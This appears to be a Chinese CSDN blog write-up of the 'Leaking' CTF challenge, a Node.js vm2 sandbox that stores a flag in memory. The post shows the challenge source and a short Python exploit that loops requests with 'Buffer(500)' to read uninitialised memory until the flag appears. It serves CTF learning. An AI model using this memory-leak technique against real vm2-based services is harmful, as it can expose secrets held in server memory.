xctf攻防世界Leaking wp

最新推荐文章于 2022-06-24 16:53:00 发布
最新推荐文章于 2022-06-24 16:53:00 发布
阅读量1.6k 收藏 5
点赞数 3
分类专栏: CTF writeup 文章标签: nodejs python wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/112669105
版权
CTF 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
writeup
12 篇文章 0 订阅
订阅专栏

在这里插入图片描述
访问题目地址

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

简单分析可以看出是一道关于node.js沙箱逃逸的问题,首先定义变量 flag,然后可以在沙箱里面执行任意的命令,那问题是如何逃逸出去呢?
Google了一下:

在这里插入图片描述
这儿的环境是 8.0 之前的,所以我们使用 Buffer()来读取内存,这个和 Linux 读内存原理差不多
直接上EXP:

# encoding=utf-8

import requests
import time
url = 'http://your ip:port/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break

拿到flag
在这里插入图片描述
flag{4nother_h34rtbleed_in_n0dejs}

思考:node.js沙箱逃逸的原理是甚么?

sash1mi
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XCTF攻防世界web.doc
09-19
0x01 view-source 【题目描述】 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 ...在url中提交后便可访问页面源码,在...
[HITCON 2016]Leaking沙箱逃逸学习
Y4tacker的博客
02-23 780
[HITCON 2016]Leaking沙箱逃逸学习 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。但是这道题比较有意思 考点是: node.js中VM2沙箱逃逸 JS通过Buffer 类处理二进制数据的缓冲区 首先给出了题目的源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var {
BUUCTF [HITCON 2016] Leaking
Senimo
01-15 766
BUUCTF [HITCON 2016] Leaking 考点: 启动环境: "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.g
[HITCON 2016]Leaking node.js沙箱逃逸
a3320315的博客
02-08 1938
0x01 源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("...
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1627
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
攻防世界 web高级 leaking
beihai2013
01-18 677
考察:node.js逃逸 参考: https://blog.csdn.net/weixin_44037296/article/details/112387663 https://blog.csdn.net/weixin_46676743/article/details/112669105 不知道咋说,直接抄源码 # encoding=utf-8 import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)'
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
攻防世界 WEB leaking
qq_41696858的博客
08-25 356
这题考的是node.js沙箱逃逸,之前没遇到过,属于是又学到新知识了 具体看这一篇,https://juejin.cn/post/6889226643525599240 简单说一下原理吧,就是理论上沙箱里的代码只能与vm上下文打交道,可是vm上下文确是可以与沙箱外的代码和变量打交道的,因此,如果我们能够构造请求, 使得vm上下文代替我们去读取利用沙箱外的代码和变量的话,那就形成了沙箱逃逸,拿这一题来举个例吧 先看一下代码 "use strict"; var randomstring = require("
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
攻防世界xctfweb题leaking题解
qq_60787987的博客
03-13 5869
11打开网站我们可以看到如下代码: 正在上传… 重新上传 取消
攻防世界 web高手进阶区 5分题 leaking
闵行小鱼塘
04-14 608
攻防世界web高手进阶区的5分题,本篇是leaking的writeup
攻防世界 web leaking
Zeker62的博客
09-08 190
https://blog.csdn.net/weixin_46676743/article/details/112669105
[WUSTCTF2020]dp_leaking_1s_very_d@angerous
weixin_44110537的博客
07-17 430
题目 分析 模板题,dp泄露,直接用之前写过的代码,改一下数据即可. import gmpy2 import rsa import binascii p=0 e=65537 n = 15680834359857877495737569681518898068216674060930283109969649206824633719879251089881849623916633901520730510210143163428316854449298458656679999647115025238214
攻防世界——leaking
m0_62063669的博客
06-24 275
攻防世界——leaking进入环境,给了一段代码浅谈npm,vm,vm2,Node.js沙盒逃逸这是一题是关于Node.js沙盒逃逸的。其中var { VM } = require(“vm2”);是Node.js 官方安全沙箱的库(是Node.js有关沙盒的代码)低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么可以构造paylaod来读取内存 req.query.data.length 的限制可以通过传入数组绕过1.题目通过访问得到了一串代码,这段代码提示在沙箱中.
攻防世界-leaking-(详细操作)做题过程
qq_43715020的博客
06-18 254
攻防世界-leaking-(详细操作)做题过程
BUUCTF--[HITCON 2016]Leaking
qq_46263951的博客
08-13 248
进入页面后给出代码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res).
CTF | Web 安全学习 20/07/11
Sunny_Ducky的博客
07-11 395
题目来源:攻防世界 新手区 题目描述:查看源代码
攻防世界traffic
最新发布
07-28
- *1* *2* [xctf攻防世界 Web高手进阶区 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target=&quot;_blank&quot; data-report-click={&quot;spm&quot;:&quot;1018.2226.3001.9630&quot;,&quot;extra&quot;:{&quot;utm_source&quot;:&quot;vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值